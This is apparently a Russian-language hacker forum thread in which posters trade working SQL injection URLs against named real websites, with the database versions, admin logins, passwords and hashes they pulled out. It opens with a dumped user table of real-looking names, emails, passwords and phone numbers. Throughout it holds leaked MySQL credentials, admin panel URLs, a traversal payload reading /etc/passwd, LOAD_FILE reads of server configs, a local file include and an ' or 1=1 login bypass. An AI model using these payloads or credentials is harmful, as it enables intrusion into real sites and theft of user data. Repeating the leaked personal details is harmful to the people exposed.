Мажаров, Андрей, Михайлович, mazharov@terra-estate.ru, dd,2b9ffe69078a5dce, Терра, 1300264,
Романычева, Дарь, Владимировна, dasha@blackwood.ru, gimenei, 790ee65c6131c7c3, , 730-8559,
Букалов, Иван, Александрович, booky@mail.ru, guta, 65fed1071d8978a9, BlackWood, 7892638,
Букалов, Иван, Александрович, i.bukalov@mail.ru, knk, 500c3d5f2544c07e, BlackWood, 7892638,
Coppen, Stephen, Jonathan, steve@imptv.co.uk, lambina, 3e83a47e6998d0e7, 7259927,
Дерев, Андрей, Наумович, pahomich@pisem.net, lubimaya, 593a99e43d7b86ed, voxtel, 9670009,
Черн, Михаил, Романович, mrc@mosgorzdrav.ru, lvb1983, 6df3cfc945ad3f59, 89161342798,
Peeter, Põld, Mr, jannojarv@hot.ee, maikl166, 1d47ea711487945b, 5454545455,
Иванов, Иван, Иванович, usergei980@mail.ru, manager, 71827725083cfad3, 1342594,
asdf, asdf, sadf, jannojarv@gmail.com, pahomich, 17bf5dcb34024c24, 4523452345,
Мун, Вадим, В, moonvv@mail.ru, scoppen, *00E71180F7BD38237D72E772FBC6B, 12 мес, 775-2222,(1005),
Дорохин, Евгений, Аркадьевич, edorokhin@mail.ru, soslan, *55BC6A91C37ED36E6AD62A1594C4F, РЭМ Сервис, 514 51 01,
Гурь, Тать, Валентиновна, guta555@mail.ru, temurid, *39C9A5F1471124BB97D421F08C7F4, 4344151,
Самойлов, Тимур, Нодарович, temurid@pochta.ru, uliana, *50C7523E12C0429CCC22A6D0FB6CD, ООО "Глес, 1062147,
б, л, в, lvb1983@yandex.ru, Vlad, *88AD09B53A37B9B6DC97B76E78717, эр, 89092359560,
**************************************************
jelto_mail (596 записей)
--------------------------------------------------
mail
name
company
news
**************************************************
jelto_links
--------------------------------------------------
title
text
**************************************************
sch_users (2 записи)
--------------------------------------------------
usr_name
usr_passw
usr_status
usr_obj_id

sochi, Sch3529, 3, 0
sochi28, Fltu3864, 2, 0
**************************************************


Результат

$mysql_host="localhost";
$mysql_user="blackw";
$mysql_password="black863";
$mysql_database="blackw";

Кто не дурак - админки сам найдёт :)

*******

Cybernooky.com - sex shop
http://www.cybernooky.com/adult-toys/details.php?id='+union+select+1/*

Asextoyshop.com - sex shop

http://www.asextoyshop.com/search.php?k='

http://www.play-publishing.com/?id=-1%20union+select+1,concat_ws(version(),user(),data base()),3,4,5,6,7,8,9,10,11/*

majkel@play.play.com.pl4.0.22musiccd


http://www.telemar.com.pl/?action=art&lang=ru&oid=-1/**/union/**/select/**/1,user(),3,4/*

admin1344@akf42.rev.netart.pl


http://www.kosmetyczni.pl/czlonkowie_komunikat.php?id=-1+union+select+1,2,czas_zycia,4,5,6,7,8,concat_ws( user(),database(),version()),10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+ kosmetyczni_komunikaty/*

baza2718admin2718@akh66.rev.netart.pl4.1.22-log

Keezmovies.com pr 5

http://www.keezmovies.com/index.php?page=submit_link&tag_id=-1+UNION+SELECT+1,2,unhex(hex(version())),4,5,6,7,8 ,9,10,11,12,13,14,15,16,17/*

Computerhistory.org - Компьютерный Музей
http://www.computerhistory.org/brochures/decades.php?decade=1'+union+select+1/*

http://www.laureaelettronica.ing.univpm.it/page.php?id=-2+union+select+1,2,3,unhex(hex(concat(user,char(58 ),password))),5+from+mysql.user/*
root:79ea7f5a2c254db7

http://www.job-searchuk.co.uk/pb_content_page.php?id=-14+union+select+1,concat(CURDATE(),0x3a,USER(),0x3 a,DATAbaSE(),0x3a,VERSION()),3/*
не могу найти таблицы(

http://home.antidate.org/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD,0x3a,email),0,0,0,0,0,0+FROM+mos_users--

ANTIDATE.ORG

ЮСКА:
http://www.co.mason.wa.us/astr/permits.php?parcel_number=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,unhex(hex(TABLE_NAME)),25 ,26,27,28+from+INFORMATION_SCHEMA.TABLES/*

Национальная Федерация Производителей Фонограмм
_http://www.nfpf.org/press/index.php?id=-1+union+select+a_login,a_pwd+from+accounts/*
Зы:Админку не искал)

AkyHa_MaTaTa
http://www.co.mason.wa.us/astr/permits.php?parcel_number=-1+union+select+
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,unhex(hex(concat(password,0x3a,user_id)) ),25,26,27,28+from+supercalendar.users/*
токо вот где админка?)

Night club.
http://www.seone-london.com/master.php?page=event&id=-1061+union+select+1,2,3,4,5,6,7 ,8,9 ,0, 1,2,3,4/*


Version: 5.0.32-Debian_7etch1~bpo.1-log
Database : se1admini_se1
User : se1admini_se1@supremecenter10.co.uk

http://casa-latina.ru/s/?cat=9999+union+select+1,concat(USER(),DATABASE()) ,3,4,5,6,7/*

AkyHa_MaTaTa

токо вот где админка?)

а админка вот она

http://www.co.mason.wa.us/phpmyadmin/

=)))

[:|||||:]
http://casa-latina.ru/s/?cat=9999+union+select+1,concat(username,0x3a,pass word,0x3a,salt,0x3a,email,0x3a,icq),3,4,5,6,7+from +vb3_user+where+userid=1/*
http://casa-latina.ru/s/?cat=9999+union+select+1,concat(username,0x3a,pass word,0x3a,email),3,4,5,6,7+from+casalati_test.smil es_users/*
вобшем.. странная база))

gisTy
ну эт хорошо если нету этого ;)
SELECT command denied to user 'mason_web'@'www.co.mason.wa.us' for table 'user'

Преамбула:
В общем, купил плеер себе assistant am-241 сегодня... Ну думаю-нифига себе экран, и как тут без видео, начал софтом что на диске конвертить-не работает :( .. Закачал новую версию конвертора, и та же фигня с определением. Потом инструкцию перечитал, ну блин, всё копейка в копейку делаю, ну ни как не принимает.
Ну, думаю сволочи-отмщу!! :/ искал их сайт и нашёл украинский филиал с багом-вот вам скуля (это ужо амбула :) )

http://assistant.net.ua/index.php?id=110&tovar=-30+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3A3a ,login,pass,id),11,12,13,14,15+from+users/*

http://assistant.net.ua/admin -саатвецвенна админка

myst::qwe::5

логин,пасс,ид^^^

Эх, украинцы (хоть бы пароли оригинальней придумали, да в хэш загнали, shop ведь)...
И тут думаю-...чё не в медиа залить попробовать, а в дата и не определить видео файлменеджером на формат и читабельность (ну далеко менять ехать по гарантийке)...И получилось.
Так вот-дело не в скуле, а видел я когда копал гугл на предмет сабжа, что некий N1ghtmare спрашивал, как же разморочить модель эту на качество и разрешение (http://siemenz.ru/forum/22-285-1)...Вот и подумал, так сказать "скомпоновать", ибо видел человека с похожим ником тут.Если это тот человек и интересно ещё, конечно,то вроде обосновал или в ПМ.У меня работает :) Фильмы смотрю, не жалуюсь :) а шелл заливать не стал-(хоть и можно), стало обидно за себя, что раньше не догадался.
А модеров прошу минуса не ставить, т.к. по сабжу вроде отписал.Ну если вы на эту тему погуглите-то ничего подобного не найдёте-а ведь много людей купили и инетерсуются.

www.alwg.cap.gov

http://www.alwg.cap.gov/index.php?menu=-90+union+select+1,2,concat(database(),0x3a,version (),0x3a,user()),4,5/*

aer.noao.edu

http://aer.noao.edu/AERArticle.php?issue=-2+union+select+1,concat(Login,0x3a,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15+FROM+Reviewers/*

выводится почемута не хочет кто вывидет мож.


phoenix.lpl.arizona.edu

http://phoenix.lpl.arizona.edu/blogsPost.php?bID=-145+union+select+1,2,3,4,concat(username,0x3a,pass word,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20+FROM+ssp2g_admins/*

phoenix:tom@rs:mike@woodpilestudios.com никаких md5 пасс в открытом виде )

Autobuilding.ru
http://www.autobuilding.ru/gobanner.php?id=1'+order+by+1/*
и подбирать)) но вот на это ругается:
http://www.autobuilding.ru/gobanner.php?id=1'union+select+1/*

~!DoK_tOR!~, так интереснее:
http://phoenix.lpl.arizona.edu/blogsPost.php?bID=-145+union+select+1,2,3,4,concat(auth_user,0x3a,aut h_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+F ROM+authors+where+auth_status=0x61646d696e/*
awkes1.lpl.arizona.edu/admin/

http://www.bmoca.org/artist.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25+from+users/*
Логин = bmoca
Пасс = !boulderart!
Админка вот http://www.bmoca.org/admin
но ввойти почему то не могу((((( Чё так всё плохо?

http://support.jgaa.com/index.php?cmd=ShowProduct&ID=-1/**/union/**/select/**/1,concat(Id,char(20),Name,char(20),Password),3,4,

5,6,7/**/from/**/User/*

20121 юзверей ..

_http://www.identidadlatina.com/columnista_det.php?col_id=-37+UNION+SELECT+1,2,3,concat(user,char(58),passwor d)+FROM+mysql.user/*

turtlevsbunny.com
http://turtlevsbunny.com/index.php?id=-2+union+select+1,2,concat_ws(0x3,version(),user(), database()),4,5,6,7,8/*

5.0.24a-standard-logjdigital_news@redondo.dreamhost.comjdigital_n ews
http://turtlevsbunny.com/index.php?id=-2+union+select+1,2,concat_ws(0x3,cal_lastname,cal_ passwd,cal_email,cal_is_admin),4,5,6,7,8+from+cale ndar.webcal_user/*
Administrator21232f297a57a5a743894a0e4a801fc3:adm in

www.alyamamah.edu.sa


http://www.alyamamah.edu.sa/showpage.php?id=-160+union+select+1,concat(name,0x3a,password,0x3a, email),3,4,5,6,7,8,9,10,11,12,13+FROM+ems_members+ limit+1,1/*

aziz:d0970714757783e6cf17b26fb8e2298f:azizsoft@lan tech.cc

www.bupipedream.com

http://www.bupipedream.com/pipeline_web/display_article.php?id=-1'+union+select+1,2,3,4,concat(database(),0x3a,ver sion(),0x3a,user()),6,7,8,9,10,11,12,13/*


http://www.evacsports.com/team.php?id=-1+union+select+concat_ws(0x3,version(),user(),data base()),2/*

~!DoK_tOR!~

aziz:112233:azizsoft@lantech.cc

http://www.alyamamah.edu.sa/showpage.php?id=-160+union+select+1,concat(name,0x3a,password,0x3a, email),3,4,5,6,7,8,9,10,11,12,13+FROM+ems_members+ where+id=1/*
перебор по ID, удобнее испольховать вместо limit)

так интереснее: ;)
http://www.alyamamah.edu.sa/showpage.php?id=-160+union+select+1,concat(username,0x3a,password,0 x3a,id),3,4,5,6,7,8,9,10,11,12,13+FROM+login/*
www.alyamamah.edu.sa/admin/

На американском сайте ЦРУ
http://www.cia.gov/
если в поиск ввести ' кажися SQL!!!
Там БД будет дорого стоить при удачном взломе!!!

http://www.egmont.ru/journals/articles.php?id=4%20union%20select%201,2,3,4,5,6,7 ,8,concat_ws(0x3A,table_schema,TABLE_NAME),0,1,2,3 ,4,5,6,7,8,19+FROM+INFORMATION_SCHEMA.TABLES%20lim it%2050,1/*
ничего особенного

BlackSun - немножко поправил)
http://support.jgaa.com/index.php?cmd=ShowProduct&ID=-1/**/union/**/select/**/1,concat(Id,char(20),NickName,char(20),Password,ch ar(20),email),3,4,5,6,7/**/from/**/User/*
Nightmarе
это не иньекция.

кому надо берите :\

http://spark-portal.ru/fileinfo.php?id=-111+UNION+SELECT+1,concat_ws(0x3a,username,user_pa ssword)+from+sp_users/*


админ форума:
swt:rb,thgfyr

maxster
http://spark-portal.ru/fileinfo.php?id=-111+UNION+SELECT+1,concat(username,0x3a,user_passw ord,0x3a,user_id)+from+bb3stable_users/*
но где админка?)

Билан, гыыыыы)) (нужна регистрация)
http://www.bilandima.ru/friendsclub/passquestion.php?email=aaa'+or+1=1/*
http://www.bilandima.ru/friendsclub/passquestion.php?email=aaa'+union+select+1/*
http://www.bilandima.ru/friendsclub/passquestion.php?email=aaa'+or+1=1+union+select+11 111+limit+16,1/*
http://www.bilandima.ru/friendsclub/userinfo.php?id=69691&tar=1'+union+select+11,22,33,44/*
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
,25,26,27,28/*
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_w
s(0x3a,version(),database(),user()),23,24,25,26,27 ,28/*
http://www.bilandima.ru/friendsclub/readers.php?id=0'+union+select+111/*
http://www.bilandima.ru/friendsclub/mydnevnikchg.php?chg=53113'+union+select+1,2,3,4,5 ,6,7/*

sabe, в твоём случае админки может и не быть. Мот там у админа какие-нить новые кнопочки появляются;-)

http://www.calbank.net/newsite/products&services/index.php?id=99999+union+select+1,2,VERSION(),4,5, 6,7,8,9/*
VERSION: 4.1.22-standard-log
USER: 334937_alfred@172.16.11.215
DATABASE: 334937_calcms

========================================
http://www.euro-flash.net/release.php?ID=99999+union+select+1,2,VERSION(),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27/*
VERSION: 5.0.45-COMMUNITY
USER: NIKITIN_NIKITIN@LOCALHOST
DATABASE: NIKITIN_EUROFLASH

========================================
http://www.naturallyyoumagazine.com/house.php?id=99999+union+select+1,2,VERSION(),4/*
VERSION: 4.0.27-icd1-log
USER: naturally@localhost
DATABASE: ny_db

ProTour

http://protour.prositer.ru/tours/index.php?ttid=14+AND+1--
http://protour.prositer.ru/countries/?id=14+and+1--
http://protour.prositer.ru/tours/index.php?ttid=14+AND+1<ascii(substring((version()),3,1))--
VERSION(): 4.1.11-Debian_4sarge7-log
DATABASE(): prositer_tour
USER(): prositer_tour@77.221.130.3

Имена колонок подобрать несмог, мускул 4 ..

http://www.luthiersargentinos.com.ar/data.php?id=0&p=1&nota=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e 2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e 2f2e2e2f2e2e2f2e2e2f6574632f706173737764,10,11,12, 13,14/*

http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user_login ,user_pass,user_email,user_url,user_status,user_ni cename)+using+latin1),3,4,5,6,7,8+from+wp_users+li mit+0,1/*
version()=5.0.15
login = admin
pass = saddam
Кто сможет найти админку, дайте ссылку!!)))

http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user_login ,user_pass,user_email,user_url,user_status,user_ni cename)+using+latin1),3,4,5,6,7,8+from+wp_users+li mit+0,1/*
version()=5.0.15
login = admin
pass = saddam
Кто сможет найти админку, дайте ссылку!!)))
http://axe.dp.ua/adm/
С первого раза:D

http://www.funnybusiness.ca/news.php?id=-3+UNION+SELECT+1,concat_ws(0x3a,client,password,na me),3,4,5,6+from+login_client/*
http://www.cagayandeoro.gov.ph/index.php?page=news&id=-1+union+select+1,2,concat_ws(0x3a,account_username ,account_password),4,5,6,7,8,9+from+tbl_account/*

На100ящий, S00pY
в админку не заходит с твоим пасом. может из другой базы?

Вот еще базы:
http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user,pass, email)+using+latin1),3,4,5,6,7,8+from+test_190.use rs+where+privilege=1/*
http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,us_group_i d,us_login,us_password)+using+latin1),3,4,5,6,7,8+ from+test_267.users/*

http://www.periodontology.gr
база
$host="localhost";
$user="root";
$pass="sqlr@m@";
$Name="1to1db";
PS если не сюда запостил удалите плз

http://old.rusmet.ru/production.php?act=comp&comp_id=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion())/*&data_type=1&page=2
Версия:4.1.22
Пользователь:rusmet@localhost
База:rusmet_comp

http://www.metall.dn.ua/answer.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2/*
Версия:4.1.22
Пользователь:metalpor_metalpo@localhos
База:metalpor_clients

http://alesya.by/interview.php?act=intview&int=-24+union+select+1,2,3,4,5/*

USER(): u93086@10.10.153.161
DATABASE(): u93086_alesa
VERSION(): 5.0.45-log

www.shoesandblues.com

http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password) ,4,5,6,7,8+from+users/*

badlaura:cheney
becc:brian
janee:johnny
zoe:taylor

http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password ,0x3a,id),4,5,6,7,8+from+blog/*

админки не нашёл (

Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a ,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/

Электронная почта
E-mail

Пароль
Password

подставляем " ' " и емеем

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

Cпособ #3
Емеем в рот =)

(Local include)

http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

И незабудь резину (Proxy)

Web-defence.ru

_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,password+from+_manager/*
version():5.0.45-log
pass:a86aea5517a58dd5674aa8dd89337e03
Ps:Есть также табла "users"
http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,concat_ws(0x3a,name,email,add ress,phone,rank)+from+users+limit+1,1/*

http://www.btl.ru/admin/
Pss:_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,login,password+from+passwords+l imit+0,1/*

www.semplice.it


http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9/*


5.0.45:cucina@semplice.village.it:cucina


http://www.semplice.it/cucina_scheda.php?id=-99999+union+select+1,TABLE_NAME,3,4,5,6,7,8,9+FROM +INFORMATION_SCHEMA.TABLES+limit+17,1/*

telematrixusa.com
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C6 1,0x3,version(),user(),database())/*
5.0.45-community-nt-logtelmtrxusa@localhosttelematrix
http://www.telematrixusa.com/index.php?id=999+union+select+concat(0x626C61626C6 1,0x3,username,0x3,password)+from+admin/*
webadminwebdemo
http://www.telematrixusa.com/siteadmin

http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*


database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost

P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)

http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*

P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.

http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+1/*


database: bsigroup_out
version: 5.0.22
user: bsigroup_newwww@localhost

P.S. есть таблица _system_user Поля(_Name,_status,_login_xz,_pass_xz)

http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+_login_xz+from+_system_user/*

P.P.S. Сам не до крутил её , кто найдёт что интересно киньтесь плз на мыло)) так не сайт нужен просто интересно чё от туда можно вытащить было.


http://www.bsigroup.ru/outgoing/country.php?id=-1+union+select+concat_ws(0x3a,_name,_login_xz,_pas s_xz)+from+_system_user+where+_system_user_id=1/*

Super User:root:89905f508ebdc32e7eb0c24fdb118305

логин был зашифрован в md5 )

www.bisart.ru --- в антибояне нет

http://www.bisart.ru/auto/index.php?sid=54+union+select+1,version(),3,4,5,6, 7/*

4.0.27-log
db11539m
m11539@he.hoster.ru

ЗЫ. первый найденный мной скуль иньект :) правда с 4ой базой я еще не работал ...

http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User(),0x7873716C696E6A656E64),0x71),0x71)%23

Database Version: 5.0.18-standard-log
Database name: db_bgmaker
User name: cay@skybar.dreamhost.com

http://bgmaker.ventdaval.com/get.php?id=-9999999 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626 567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User(),0x7873716C696E6A656E64),0x71),0x71)%23

фигасе закрутил. :D

http://www.rakurs.rovno.ua/info.php?id=-4740+union+select+от, одного,до,шести,database(),кагбе восемь,9,version(),user(),12,13,14/*

database() - rakursr_db
version() - 5.0.45
user() - rakursr_user@localhost

Эммм тулза sql-inj tool конечшно полезная.
но прежде чем выкладывать проверяй в браузере.

Не проще ли пере писать в нормальном виде по количеству столбцов?
ты наркоман? этого
Database name: db_bgmaker
User name: cay@skybar.dreamhost.com

не достаточно ?

Правительство Амурской области
http://www.amurobl.ru/index.php?m=&r=3&c=-1/**/union/**/select/**/0,1,2,3,version(),5,6/*

Ну вот и расшифровался в базе хешик
root:*313D4F6D366ADB0901FFDDA18A2A5D156C99BD1F:rel ixrelix
выкладывал до этого, но раз не полностью раскрученно было- убрал, теперь все ок =)
давайте погуглим: answer.php?rub=
Да, вот и пожалуйста:
и так:
http://******.zao.mos.ru/answer.php?rub=
-1+union+select+LOAD_FILE('/usr/local/apache/httpd.conf'),2,3,4,5,6,7/*
-1+union+select+concat(user,0x3a,password),2,3,4,5, 6,7+from+mysql.user/*
file_priv=Y
а что дальше? а вот что.Что в столице денег нет что ли на нормальный не бажный сайт? Не верю. для zao.mos.ru на Битрикс бабла хватило :(

http://www.weed.ru/pphlogger/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,vers ion(),null,null,null,null,null,null,null,null,null ,null,null,null,
null,null,null,null,null,null,null,null,null%20fro m%20pphl_users%20limit%200,1&action=edit

PS: auth:
имя: blacksun
пароль: B1kC9i4P

sql иньекциях не силен по этому и хочу разобраться чё к чему

www.rayner.com

Поехали)
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9+from+mysq l.user/*
5.0.32-Debian_7etch1-log

http://www.rayner.com/products.php?id=-1+union+select+1,2,3,user,5,6,7,8,9+from+mysql.use r/*
Даёт user их 5.

http://www.rayner.com/products.php?id=-1+union+select+1,2,3,password,5,6,7,8,9+from+mysql .user/*
а по такому запросу пишет как я по нимаю пароли в зашифровки mb5.

*0EF29B1AED94CC60062FED7F4DF2224A0C880A10
*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD
*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83
*8050739003BBDB60551FA99B5FFF34957C4F5F49


Тек ли это и стоит ли тратить време на их расшифровку??? :confused: :confused: :confused:

http://zoorinok.com.ua/zoo_details.php?id=-9061+union+select+1,2,3,4,5,6,7,8,9,0,1,concat_ws( char(58),username,user_password,user_icq,user_emai l),3,4,5,6,7,8,9,0,1,2,3,4,5+from+phpbb_users/*

http://www.pilot-film.com/index.php?p=show_person&pid=-2+union+select+1,2,3,4,5,6,7,8,9,10/*

tor4)
это не MD5, это mysql(des..) тебе сюда http://forum.antichat.ru/thread12768.html

или.. вытаскивай пароли админов сайтов. например:
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,concat_ws(0x3a,loginname,pass word),5,6,7,8,9+from+db2908_phplist.admin/*

rayner.com/stats
или можно вобще весь сервак похекать..

Apache/2.2.3 (Debian) PHP/4.4.4-8+etch4 mod_ssl/2.2.3 OpenSSL/0.9.8c Server at www.rayner.com Port 80

уязвимость - Apache Mod SSL Util UUEncode Binary Stack Buffer Overflow Vulnerability

+ еще есть ХСС.. и BlindSQL.

наврено сайт для тренеровки сделан ;)

пока разбеаюсь с этой:
http://www.inderscience.com/mapper.php?id=31'+union+select+1/*

www.saltillo.com

Уязвимость:

http://www.saltillo.com/products/index.php?product=36&product_id=15'

Столбцы:

http://www.saltillo.com/products/index.php?product=36&product_id=15+union+select+1,2,3,4,5,6,7,8,9,0/*

Информация:

4.0.27-log
contentdata
saltillo@localhost


P.S. скиньте в пм ссылки на инфу о инжектах в 4ых базах

Помогите..
Вобщем Http://truba.karelia.ru
просто добавил к этому http://truba.karelia.ru/ls_server
и получилось

error:

MySql error: Unknown column 'shuric' in 'where clause'

query: SELECT `ls_folders`.`folder_id`, `ls_folders`.`folder_name`, `ls_folders`.`system_folder`, `ls_contacts`.`user_passport_login`, `ls_contacts`.`contact_passport_login`, `ls_contacts`.`contact_name`, `ls_contacts`.`message_size`, `ls_contacts`.`create` FROM `ls_contacts` LEFT JOIN `ls_folders` ON `ls_contacts`.`folder_id`=`ls_folders`.`folder_id` WHERE `ls_contacts`.`contact_id`=shuric AND `ls_contacts`.`user_passport_login`='romanp' LIMIT 1

Может кто поможет че нить придумать с этим сайтиком?

Cantonrep.com
http://www.cantonrep.com/index.php?ID=1'+union+select+1,2,AES_DECRYPT(AES_E NCRYPT(CONCAT(0x7873716C696E6A626567696E,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716 C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13 ,14/*
токо она слепая.. что можно сделать?

Cantonrep.com

подбираю.. помощь приветствуется..)
http://www.cantonrep.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14/*
слепая чтоли? :confused:

www.hostcheck.net


http://www.hostcheck.net/ReviewReports.php?id=-1+union+select+concat_ws(0x3a,loginName,password,f irstName)+from+users+where+userID=1/*

admin:f1bo24:Sarath

Cantonrep.com

подбираю.. помощь приветствуется..)
_http://www.cantonrep.com/index.php?ID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Сори запостил не обновляя ветку)




_http://www.rocit.ru/news/shownews.php3?id=-1+union+select+1,2,3,4,user(),database(),7,version (),9,10/*

database():rocit@localhost

user():rocit

version():4.0.27-1-log

Breitbart.com
http://www.breitbart.com/article.php?id=1'+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101/*
подбираю.. помощь приветствуется..)

Breitbart.com

подбираю.. помощь приветствуется..)

Вот бажный скрипт)
http://www.breitbart.com/email.php?link=/article.php?id=080605061948.m7rkwwx2&show_article=1&image=large&id=1'+union+select+1,2,version(),4,5,6,7,8,9,10,11 ,12/*

breitbart:breitbart@localhost:4.1.20-log
Жопный вариант подобрать Имя таблици не получилось :(

http://www.horsens-emballage.dk/products.php?id=121+union+select%201,user(),3,4,5

http://doshirak.com/PWE/etc/loader.php?mid='75&mode=local&module=/etc/checkanswer&template=checkanswer.aj

помогите раскрутить и вообще рабочая она ли ?

Секс шоп
_http://eroshop.com.ua/?sec=det&id=0'+UNION+SELECT+1,2,concat(login,0x3a,password) ,4,5,6,7,8,9,10,11,12,13,14+FROM+users/*
Admin:19820429

http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(USER(), 0x3a,VERSION(),0x3a,DATABASE())
user:paintball_user@localhost
version:5.0.51a-community-log
-------------------------------------------------------------------------------------------------------------------
http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(login,0 x3a,pass,0x3a)+from+pb_users
+limit+1,1
логины и пароли от 234 пользователей
-------------------------------------------------------------------------------------------------------------------
там еще много чего...

http://www.horsens-emballage.dk/products.php?id=121+union+select%201,user(),3,4,5
вот так тож можно :)
http://www.horsens-emballage.dk/products.php?id=121+union+select%201,password,3,4, 5+from+users
------------------------------------------------------------------
admin:6acb8c143d32f46326b37aa2fff1bced

сайт посвящённый программированию:
http://devoid.com.ua/print.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11+--+

знаменитый ИСХОДНИКИ.РУ
http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13,14,15+from+admin/*
admin:d2811372903d0e598162e5762cd18340db68d846 -> flash15

а вот админку так и не нашёл =(

вот еще интересненькое:
http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,pwd),6,7,8,9 ,10,11,12,13,14,15+from+_wfspro_admin/*
admin
или
http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,pass),6 ,7,8,9,10,11,12,13,14,15+from+sympoll_auth/*

www.kulturflooring.com

Уязвимость в скрипте:

http://www.kulturflooring.com/index.php?id=1'

Подбор колонок:

http://www.kulturflooring.com/index.php?id=-1+union+select+1,2,3,4/*

Информация о базе:

4.0.26
kulturflooring_com
kultur@kulturflooring.com

www.kulturflooring.com http://kulturflooring.com/admin/index.php
Username:' or 1=1/*
Password:Nea7

http://o-sport.ru/
http://o-sport.ru/top/stats.php?id=89'+union+select+1,version(),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
5.0.30-Debian_1-log
Вытащил все че мог я)

admin:508504343ef23ff48724729cd07281e7 =>290486 Если база с хэшей не врет.

Админку не нашел если кто найдет Дайте знать где она.

www.ivan-pomidorov.com/
http://www.ivan-pomidorov.com/gallery_full.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,14,15,16 ,17/*

www.yago.by
http://www.yago.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

